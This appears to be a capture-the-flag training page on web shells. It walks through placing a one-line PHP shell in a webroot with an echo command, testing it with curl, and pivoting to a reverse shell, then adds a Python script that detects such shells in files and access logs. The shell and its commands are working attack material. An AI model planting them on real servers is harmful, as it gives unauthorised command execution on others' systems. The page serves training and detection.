# WF-Web Shell

Use this page when you already have web-based code execution, file upload, or write access to the webroot.

### Quick loop

1. Find a writable path.
2. Place the web shell.
3. Test command execution.
4. Use it to run commands.
5. Treat it as a bridge.

{% stepper %}
{% step %}

### Find the execution path

Confirm where executable web content lives.

Common webroots:

* Apache on Linux — `/var/www/html`
* Nginx — `/usr/share/nginx/html`
* XAMPP — `/htdocs`

You need both write access to the directory and script execution enabled for it.
{% endstep %}

{% step %}

### Place the web shell

Write a web shell into the webroot.

Example PHP shell:

```php
<?php system($_REQUEST["cmd"]); ?>
```

Example write path:

```bash
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php
```

{% endstep %}

{% step %}

### Test command execution

Access the web shell through the browser or with `curl`.

```bash
curl "http://<TARGET_HOST>/shell.php?cmd=id"
```

If the command runs, the page prints the output back to you.
{% endstep %}

{% step %}

### Use it to run commands

Change the `cmd` value on each request to run a different command and read its output.

Use it when:

* you gain file upload
* you have command injection or RCE in a web app
* you need a simple way to run commands through the web server
{% endstep %}

{% step %}

### Treat it as a bridge

A web shell is usually less interactive than a reverse shell, so it is often best used as a stepping stone to a reverse shell or a better shell.
{% endstep %}
{% endstepper %}
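
The one-liner and the `curl` test above leave two artifacts a defender can look for: a PHP file that passes request input straight to a command function, and access-log entries carrying commands in the query string. The sketch below is an added example, not part of the original page; the combined log format, the recon-command list, and the sample log lines are assumptions constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit, parse_qsl

# Command-execution function called directly on a request superglobal,
# the shape of the one-liner on this page. Obfuscated shells will not match.
SHELL_RE = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*"
    r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[", re.I)
# Access-log line in Apache/Nginx combined format (assumed).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) ')
SHELL_PARAMS = {"cmd"}  # parameter name used on this page; extend as needed
RECON_RE = re.compile(r"^(?:id|whoami|uname|hostname|pwd)\b")  # assumed list

def scan_webroot(root):
    """Return PHP files under root that pass request input to a command function."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        if SHELL_RE.search(path.read_text(errors="replace")):
            hits.append(str(path))
    return hits

def suspicious_requests(log_lines):
    """Return (client, path, param, value, status) for shell-like PHP requests."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith(".php"):
            continue
        for name, value in parse_qsl(url.query):
            if name.lower() in SHELL_PARAMS or RECON_RE.match(value):
                hits.append((client, url.path, name, value, int(status)))
                break
    return hits

# Constructed sample log lines (not from a real host).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2025:10:00:05 +0000] "GET /shell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"',
    '203.0.113.9 - - [01/Jan/2025:10:00:09 +0000] "GET /upload/a.php?x=whoami HTTP/1.1" 200 9 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Run `scan_webroot("/var/www/html")` against the active webroot and feed `suspicious_requests` the server's access log; a 200 response to a flagged request means the script executed rather than being served as text or rejected.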

### Fast decision rules

* If the script does not run, verify that you wrote it to the active webroot.
* If the shell works, use it to move to a better shell.
* If the host reboots, check whether the web shell still exists.

### Useful references

* [Getting started](/capcap/readme/ctf-modules/getting-started_mod-2.md)
* [WF-Web Enumeration](/capcap/readme/ctf-modules/getting-started_mod-2/wf-web-enumeration.md)
